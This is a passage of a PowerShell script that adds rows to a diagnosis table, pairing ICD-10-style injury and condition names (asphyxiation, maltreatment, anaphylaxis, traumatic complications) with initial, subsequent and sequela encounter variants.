initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, intentional self-harm","Asphyxiation due to mechanical threat to breathing due to other causes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, intentional self-harm","Asphyxiation due to mechanical threat to breathing due to other causes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, assault","Asphyxiation due to mechanical threat to breathing due to other causes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, assault","Asphyxiation due to mechanical threat to breathing due to other causes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, assault","Asphyxiation due to mechanical threat to breathing due to other causes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, undetermined","Asphyxiation due to mechanical threat to breathing due to other causes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, undetermined","Asphyxiation due to mechanical threat to breathing due to other causes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, undetermined","Asphyxiation due to mechanical threat to breathing due to other causes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to systemic oxygen deficiency due to low oxygen content in ambient air due to unspecified cause","Asphyxiation due to systemic oxygen deficiency due to low oxygen content in ambient air due to unspecified cause, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to systemic oxygen deficiency due to low oxygen content in ambient air due to unspecified cause","Asphyxiation due to systemic oxygen deficiency due to low oxygen content in ambient air due to unspecified cause, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to systemic oxygen deficiency due to low oxygen content in ambient air due to unspecified cause","Asphyxiation due to systemic oxygen deficiency due to low oxygen content in ambient air due to unspecified cause, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to cave-in or falling earth","Asphyxiation due to cave-in or falling earth, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to cave-in or falling earth","Asphyxiation due to cave-in or falling earth, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to cave-in or falling earth","Asphyxiation due to cave-in or falling earth, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, accidental","Asphyxiation due to being trapped in a car trunk, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, accidental","Asphyxiation due to being trapped in a car trunk, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, accidental","Asphyxiation due to being trapped in a car trunk, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, intentional self-harm","Asphyxiation due to being trapped in a car trunk, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, intentional self-harm","Asphyxiation due to being trapped in a car trunk, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, intentional self-harm","Asphyxiation due to being trapped in a car trunk, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, assault","Asphyxiation due to being trapped in a car trunk, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, assault","Asphyxiation due to being trapped in a car trunk, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, assault","Asphyxiation due to being trapped in a car trunk, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, undetermined","Asphyxiation due to being trapped in a car trunk, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, undetermined","Asphyxiation due to being trapped in a car trunk, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a car trunk, undetermined","Asphyxiation due to being trapped in a car trunk, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, accidental","Asphyxiation due to being trapped in a (discarded) refrigerator, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, accidental","Asphyxiation due to being trapped in a (discarded) refrigerator, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, accidental","Asphyxiation due to being trapped in a (discarded) refrigerator, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, intentional self-harm","Asphyxiation due to being trapped in a (discarded) refrigerator, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, intentional self-harm","Asphyxiation due to being trapped in a (discarded) refrigerator, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, intentional self-harm","Asphyxiation due to being trapped in a (discarded) refrigerator, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, assault","Asphyxiation due to being trapped in a (discarded) refrigerator, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, assault","Asphyxiation due to being trapped in a (discarded) refrigerator, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, assault","Asphyxiation due to being trapped in a (discarded) refrigerator, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, undetermined","Asphyxiation due to being trapped in a (discarded) refrigerator, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, undetermined","Asphyxiation due to being trapped in a (discarded) refrigerator, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in a (discarded) refrigerator, undetermined","Asphyxiation due to being trapped in a (discarded) refrigerator, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in other low oxygen environment","Asphyxiation due to being trapped in other low oxygen environment, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in other low oxygen environment","Asphyxiation due to being trapped in other low oxygen environment, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in other low oxygen environment","Asphyxiation due to being trapped in other low oxygen environment, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to unspecified cause","Asphyxiation due to unspecified cause, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to unspecified cause","Asphyxiation due to unspecified cause, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to unspecified cause","Asphyxiation due to unspecified cause, sequela") + $null = $DiagnosisList.Rows.Add("Starvation","Starvation, initial encounter") + $null = $DiagnosisList.Rows.Add("Starvation","Starvation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Starvation","Starvation, sequela") + $null = $DiagnosisList.Rows.Add("Deprivation of water","Deprivation of water, initial encounter") + $null = $DiagnosisList.Rows.Add("Deprivation of water","Deprivation of water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Deprivation of water","Deprivation of water, sequela") + $null = $DiagnosisList.Rows.Add("Exhaustion due to exposure","Exhaustion due to exposure, initial encounter") + $null = $DiagnosisList.Rows.Add("Exhaustion due to exposure","Exhaustion due to exposure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exhaustion due to exposure","Exhaustion due to exposure, sequela") + $null = $DiagnosisList.Rows.Add("Exhaustion due to excessive exertion","Exhaustion due to excessive exertion, initial encounter") + $null = $DiagnosisList.Rows.Add("Exhaustion due to excessive exertion","Exhaustion due to excessive exertion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exhaustion due to excessive exertion","Exhaustion due to excessive exertion, sequela") + $null = $DiagnosisList.Rows.Add("Other effects of deprivation","Other effects of deprivation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other effects of deprivation","Other effects of deprivation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other effects of deprivation","Other effects of deprivation, sequela") + $null = $DiagnosisList.Rows.Add("Effect of deprivation, unspecified","Effect of deprivation, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Effect of deprivation, unspecified","Effect of deprivation, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Effect of deprivation, unspecified","Effect of deprivation, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Adult neglect or abandonment, confirmed","Adult neglect or abandonment, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult neglect or abandonment, confirmed","Adult neglect or abandonment, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult neglect or abandonment, confirmed","Adult neglect or abandonment, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Child neglect or abandonment, confirmed","Child neglect or abandonment, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Child neglect or abandonment, confirmed","Child neglect or abandonment, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child neglect or abandonment, confirmed","Child neglect or abandonment, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Adult physical abuse, confirmed","Adult physical abuse, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult physical abuse, confirmed","Adult physical abuse, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult physical abuse, confirmed","Adult physical abuse, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Child physical abuse, confirmed","Child physical abuse, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Child physical abuse, confirmed","Child physical abuse, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child physical abuse, confirmed","Child physical abuse, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Adult sexual abuse, confirmed","Adult sexual abuse, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult sexual abuse, confirmed","Adult sexual abuse, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult sexual abuse, confirmed","Adult sexual abuse, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Child sexual abuse, confirmed","Child sexual abuse, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Child sexual abuse, confirmed","Child sexual abuse, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child sexual abuse, confirmed","Child sexual abuse, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Adult psychological abuse, confirmed","Adult psychological abuse, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult psychological abuse, confirmed","Adult psychological abuse, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult psychological abuse, confirmed","Adult psychological abuse, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Child psychological abuse, confirmed","Child psychological abuse, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Child psychological abuse, confirmed","Child psychological abuse, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child psychological abuse, confirmed","Child psychological abuse, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Shaken infant syndrome","Shaken infant syndrome, initial encounter") + $null = $DiagnosisList.Rows.Add("Shaken infant syndrome","Shaken infant syndrome, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Shaken infant syndrome","Shaken infant syndrome, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified adult maltreatment, confirmed","Unspecified adult maltreatment, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified adult maltreatment, confirmed","Unspecified adult maltreatment, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified adult maltreatment, confirmed","Unspecified adult maltreatment, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified child maltreatment, confirmed","Unspecified child maltreatment, confirmed, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified child maltreatment, confirmed","Unspecified child maltreatment, confirmed, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified child maltreatment, confirmed","Unspecified child maltreatment, confirmed, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified effects of lightning","Unspecified effects of lightning, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of lightning","Unspecified effects of lightning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of lightning","Unspecified effects of lightning, sequela") + $null = $DiagnosisList.Rows.Add("Shock due to being struck by lightning","Shock due to being struck by lightning, initial encounter") + $null = $DiagnosisList.Rows.Add("Shock due to being struck by lightning","Shock due to being struck by lightning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Shock due to being struck by lightning","Shock due to being struck by lightning, sequela") + $null = $DiagnosisList.Rows.Add("Other effects of lightning","Other effects of lightning, initial encounter") + $null = $DiagnosisList.Rows.Add("Other effects of lightning","Other effects of lightning, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other effects of lightning","Other effects of lightning, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified effects of drowning and nonfatal submersion","Unspecified effects of drowning and nonfatal submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of drowning and nonfatal submersion","Unspecified effects of drowning and nonfatal submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of drowning and nonfatal submersion","Unspecified effects of drowning and nonfatal submersion, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified effects of vibration","Unspecified effects of vibration, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of vibration","Unspecified effects of vibration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of vibration","Unspecified effects of vibration, sequela") + $null = $DiagnosisList.Rows.Add("Pneumatic hammer syndrome","Pneumatic hammer syndrome, initial encounter") + $null = $DiagnosisList.Rows.Add("Pneumatic hammer syndrome","Pneumatic hammer syndrome, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pneumatic hammer syndrome","Pneumatic hammer syndrome, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic vasospastic syndrome","Traumatic vasospastic syndrome, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic vasospastic syndrome","Traumatic vasospastic syndrome, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic vasospastic syndrome","Traumatic vasospastic syndrome, sequela") + $null = $DiagnosisList.Rows.Add("Vertigo from infrasound","Vertigo from infrasound, initial encounter") + $null = $DiagnosisList.Rows.Add("Vertigo from infrasound","Vertigo from infrasound, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Vertigo from infrasound","Vertigo from infrasound, sequela") + $null = $DiagnosisList.Rows.Add("Other effects of vibration","Other effects of vibration, initial encounter") + $null = $DiagnosisList.Rows.Add("Other effects of vibration","Other effects of vibration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other effects of vibration","Other effects of vibration, sequela") + $null = $DiagnosisList.Rows.Add("Motion sickness","Motion sickness, initial encounter") + $null = $DiagnosisList.Rows.Add("Motion sickness","Motion sickness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motion sickness","Motion sickness, sequela") + $null = $DiagnosisList.Rows.Add("Electrocution","Electrocution, initial encounter") + $null = $DiagnosisList.Rows.Add("Electrocution","Electrocution, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Electrocution","Electrocution, sequela") + $null = $DiagnosisList.Rows.Add("Effects of abnormal gravitation [G] forces","Effects of abnormal gravitation [G] forces, initial encounter") + $null = $DiagnosisList.Rows.Add("Effects of abnormal gravitation [G] forces","Effects of abnormal gravitation [G] forces, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Effects of abnormal gravitation [G] forces","Effects of abnormal gravitation [G] forces, sequela") + $null = $DiagnosisList.Rows.Add("Effects of weightlessness","Effects of weightlessness, initial encounter") + $null = $DiagnosisList.Rows.Add("Effects of weightlessness","Effects of weightlessness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Effects of weightlessness","Effects of weightlessness, sequela") + $null = $DiagnosisList.Rows.Add("Other specified effects of external causes","Other specified effects of external causes, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified effects of external causes","Other specified effects of external causes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified effects of external causes","Other specified effects of external causes, sequela") + $null = $DiagnosisList.Rows.Add("Adult neglect or abandonment, suspected","Adult neglect or abandonment, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult neglect or abandonment, suspected","Adult neglect or abandonment, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult neglect or abandonment, suspected","Adult neglect or abandonment, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Child neglect or abandonment, suspected","Child neglect or abandonment, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Child neglect or abandonment, suspected","Child neglect or abandonment, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child neglect or abandonment, suspected","Child neglect or abandonment, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Adult physical abuse, suspected","Adult physical abuse, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult physical abuse, suspected","Adult physical abuse, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult physical abuse, suspected","Adult physical abuse, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Child physical abuse, suspected","Child physical abuse, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Child physical abuse, suspected","Child physical abuse, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child physical abuse, suspected","Child physical abuse, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Adult sexual abuse, suspected","Adult sexual abuse, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult sexual abuse, suspected","Adult sexual abuse, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult sexual abuse, suspected","Adult sexual abuse, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Child sexual abuse, suspected","Child sexual abuse, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Child sexual abuse, suspected","Child sexual abuse, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child sexual abuse, suspected","Child sexual abuse, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Adult psychological abuse, suspected","Adult psychological abuse, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Adult psychological abuse, suspected","Adult psychological abuse, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adult psychological abuse, suspected","Adult psychological abuse, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Child psychological abuse, suspected","Child psychological abuse, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Child psychological abuse, suspected","Child psychological abuse, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Child psychological abuse, suspected","Child psychological abuse, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified adult maltreatment, suspected","Unspecified adult maltreatment, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified adult maltreatment, suspected","Unspecified adult maltreatment, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified adult maltreatment, suspected","Unspecified adult maltreatment, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified child maltreatment, suspected","Unspecified child maltreatment, suspected, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified child maltreatment, suspected","Unspecified child maltreatment, suspected, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified child maltreatment, suspected","Unspecified child maltreatment, suspected, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to unspecified food","Anaphylactic reaction due to unspecified food, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to unspecified food","Anaphylactic reaction due to unspecified food, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to unspecified food","Anaphylactic reaction due to unspecified food, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to peanuts","Anaphylactic reaction due to peanuts, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to peanuts","Anaphylactic reaction due to peanuts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to peanuts","Anaphylactic reaction due to peanuts, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to shellfish (crustaceans)","Anaphylactic reaction due to shellfish (crustaceans), initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to shellfish (crustaceans)","Anaphylactic reaction due to shellfish (crustaceans), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to shellfish (crustaceans)","Anaphylactic reaction due to shellfish (crustaceans), sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other fish","Anaphylactic reaction due to other fish, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other fish","Anaphylactic reaction due to other fish, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other fish","Anaphylactic reaction due to other fish, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to fruits and vegetables","Anaphylactic reaction due to fruits and vegetables, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to fruits and vegetables","Anaphylactic reaction due to fruits and vegetables, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to fruits and vegetables","Anaphylactic reaction due to fruits and vegetables, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to tree nuts and seeds","Anaphylactic reaction due to tree nuts and seeds, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to tree nuts and seeds","Anaphylactic reaction due to tree nuts and seeds, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to tree nuts and seeds","Anaphylactic reaction due to tree nuts and seeds, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to food additives","Anaphylactic reaction due to food additives, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to food additives","Anaphylactic reaction due to food additives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to food additives","Anaphylactic reaction due to food additives, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to milk and dairy products","Anaphylactic reaction due to milk and dairy products, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to milk and dairy products","Anaphylactic reaction due to milk and dairy products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to milk and dairy products","Anaphylactic reaction due to milk and dairy products, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to eggs","Anaphylactic reaction due to eggs, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to eggs","Anaphylactic reaction due to eggs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to eggs","Anaphylactic reaction due to eggs, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other food products","Anaphylactic reaction due to other food products, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other food products","Anaphylactic reaction due to other food products, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic reaction due to other food products","Anaphylactic reaction due to other food products, sequela") + $null = $DiagnosisList.Rows.Add("Other adverse food reactions, not elsewhere classified","Other adverse food reactions, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other adverse food reactions, not elsewhere classified","Other adverse food reactions, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other adverse food reactions, not elsewhere classified","Other adverse food reactions, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Anaphylactic shock, unspecified","Anaphylactic shock, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic shock, unspecified","Anaphylactic shock, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anaphylactic shock, unspecified","Anaphylactic shock, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Angioneurotic edema","Angioneurotic edema, initial encounter") + $null = $DiagnosisList.Rows.Add("Angioneurotic edema","Angioneurotic edema, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Angioneurotic edema","Angioneurotic edema, sequela") + $null = $DiagnosisList.Rows.Add("Allergy, unspecified","Allergy, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Allergy, unspecified","Allergy, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Allergy, unspecified","Allergy, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Arthus phenomenon","Arthus phenomenon, initial encounter") + $null = $DiagnosisList.Rows.Add("Arthus phenomenon","Arthus phenomenon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Arthus phenomenon","Arthus phenomenon, sequela") + $null = $DiagnosisList.Rows.Add("Other allergy","Other allergy, initial encounter") + $null = $DiagnosisList.Rows.Add("Other allergy","Other allergy, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other allergy","Other allergy, sequela") + $null = $DiagnosisList.Rows.Add("Other adverse effects, not elsewhere classified","Other adverse effects, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other adverse effects, not elsewhere classified","Other adverse effects, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other adverse effects, not elsewhere classified","Other adverse effects, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Air embolism (traumatic)","Air embolism (traumatic), initial encounter") + $null = $DiagnosisList.Rows.Add("Air embolism (traumatic)","Air embolism (traumatic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Air embolism (traumatic)","Air embolism (traumatic), sequela") + $null = $DiagnosisList.Rows.Add("Fat embolism (traumatic)","Fat embolism (traumatic), initial encounter") + $null = $DiagnosisList.Rows.Add("Fat embolism (traumatic)","Fat embolism (traumatic), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fat embolism (traumatic)","Fat embolism (traumatic), sequela") + $null = $DiagnosisList.Rows.Add("Traumatic secondary and recurrent hemorrhage and seroma","Traumatic secondary and recurrent hemorrhage and seroma, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic secondary and recurrent hemorrhage and seroma","Traumatic secondary and recurrent hemorrhage and seroma, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic secondary and recurrent hemorrhage and seroma","Traumatic secondary and recurrent hemorrhage and seroma, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic shock","Traumatic shock, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic shock","Traumatic shock, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic shock","Traumatic shock, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic anuria","Traumatic anuria, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic anuria","Traumatic anuria, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic anuria","Traumatic anuria, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic ischemia of muscle","Traumatic ischemia of muscle, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic ischemia of muscle","Traumatic ischemia of muscle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic ischemia of muscle","Traumatic ischemia of muscle, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic subcutaneous emphysema","Traumatic subcutaneous emphysema, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subcutaneous emphysema","Traumatic subcutaneous emphysema, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic subcutaneous emphysema","Traumatic subcutaneous emphysema, sequela") + $null = $DiagnosisList.Rows.Add("Compartment syndrome, unspecified","Compartment syndrome, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Compartment syndrome, unspecified","Compartment syndrome, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Compartment syndrome, unspecified","Compartment syndrome, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of right upper extremity","Traumatic compartment syndrome of right upper extremity, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of right upper extremity","Traumatic compartment syndrome of right upper extremity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of right upper extremity","Traumatic compartment syndrome of right upper extremity, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of left upper extremity","Traumatic compartment syndrome of left upper extremity, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of left upper extremity","Traumatic compartment syndrome of left upper extremity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of left upper extremity","Traumatic compartment syndrome of left upper extremity, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of unspecified upper extremity","Traumatic compartment syndrome of unspecified upper extremity, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of unspecified upper extremity","Traumatic compartment syndrome of unspecified upper extremity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of unspecified upper extremity","Traumatic compartment syndrome of unspecified upper extremity, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of right lower extremity","Traumatic compartment syndrome of right lower extremity, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic compartment syndrome of right lower extremity","Traumatic compartment syndrome of right lower extremity, subsequent encounter") + $null = 